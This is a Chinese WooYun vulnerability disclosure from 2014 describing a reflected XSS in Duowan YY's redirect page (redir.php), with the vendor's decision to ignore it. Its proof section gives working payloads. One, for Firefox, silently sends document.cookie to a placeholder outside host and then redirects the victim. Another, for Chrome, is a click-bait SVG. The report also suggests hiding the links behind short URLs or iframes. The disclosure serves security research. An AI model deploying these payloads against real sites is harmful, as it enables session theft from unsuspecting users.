当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058992

漏洞标题:多玩YY跳转页面XSS可获取用户cookie

相关厂商:广州多玩

漏洞作者: 谢统领

提交时间:2014-04-30 19:08

修复时间:2014-05-05 19:09

公开时间:2014-05-05 19:09

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

YY论坛外部链接会自动转换成:http://redir.yy.duowan.com/redir.php?url=URL
这里是通过JS进行跳转,而且没有过滤特殊标签。

详细说明:

view-source: http://redir.yy.duowan.com/redir.php?url=URL

<script language='javascript' type='text/javascript'>location.href='warning.php?url=URL'</script>


然后改成
view-source:http://redir.yy.duowan.com/redir.php?url=URL%3C/script%3E

<script language='javascript' type='text/javascript'>location.href='warning.php?url=URL</script>'</script>


可见未做任何过滤,这里可以构造XSS脚本截取用户在YY.com的登录cookie。
firefox因为基本没有XSS审查机制,所以直接可以在用户不知情的情况下获取到cookie。
而ie和chrome过滤比较严格,目前只有在诱惑用户点击的情况下获取cookie。

漏洞证明:

1.firefox下构造URL参数:

http://redir.yy.duowan.com/redir.php?url=http://www.yy.com/15487288/?%3C/script%3E%3Csvg/onload=%22javascript:var%20a=%28new%20Image%28%29%29;a.src=%27http://URL/test.php?x=%27%252BencodeURIComponent%28document.cookie%29;a.onerror=function%28%29{location.replace('http://www.yy.com/15487288/')}%22%3E


生成代码如下:

<script language='javascript' type='text/javascript'>location.href='warning.php?url=http://www.yy.com/15487288/?</script><svg/onload="javascript:var a=(new Image());a.src='http://URL/test.php?x='+encodeURIComponent(document.cookie);a.onerror=function(){location.replace('http://www.yy.com/15487288/')}">'</script>


用firefox访问时,会跳到http://www.yy.com/15487288/,但是cookie已经被远程截取。
用户在毫不知情的情况下,以为直接进入了 http://www.yy.com/15487288/。

ff1.jpg


2.chrome下构造URL参数:

http://redir.yy.duowan.com/redir.php?url=%3C/script%3E<h1>点击黑框有惊喜!</h1>%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://redir.yy.duowan.com/redir.php?url=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E


生成代码如下:

<script language='javascript' type='text/javascript'>location.href='warning.php?url=</script><h1>点击黑框有惊喜!</h1><svg><use height=200 width=200 xlink:href='http://redir.yy.duowan.com/redir.php?url=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"    width="100" height="100"><a xlink:href="javascript:alert(document.cookie)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>#rectangle'/></svg>'</script>


出现黑框,点击后弹出cookie,可惜不能自动跳转。。。

ch.jpg


也许有人会说,这种地址怎么会有人去打开,但如果是生成短网址呢:http://dwz.cn/hdBI4
或者直接在第三方网站通过iframe页面隐藏或者伪装成其它按钮诱惑用户点击呢?
3.IE下没有试,应该也可以在用户点击情况下获取cookie

修复方案:

过滤特殊字符,或者别用JS跳转。。。

版权声明:转载请注明来源 谢统领@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-05 19:09

厂商回复:

最新状态:

暂无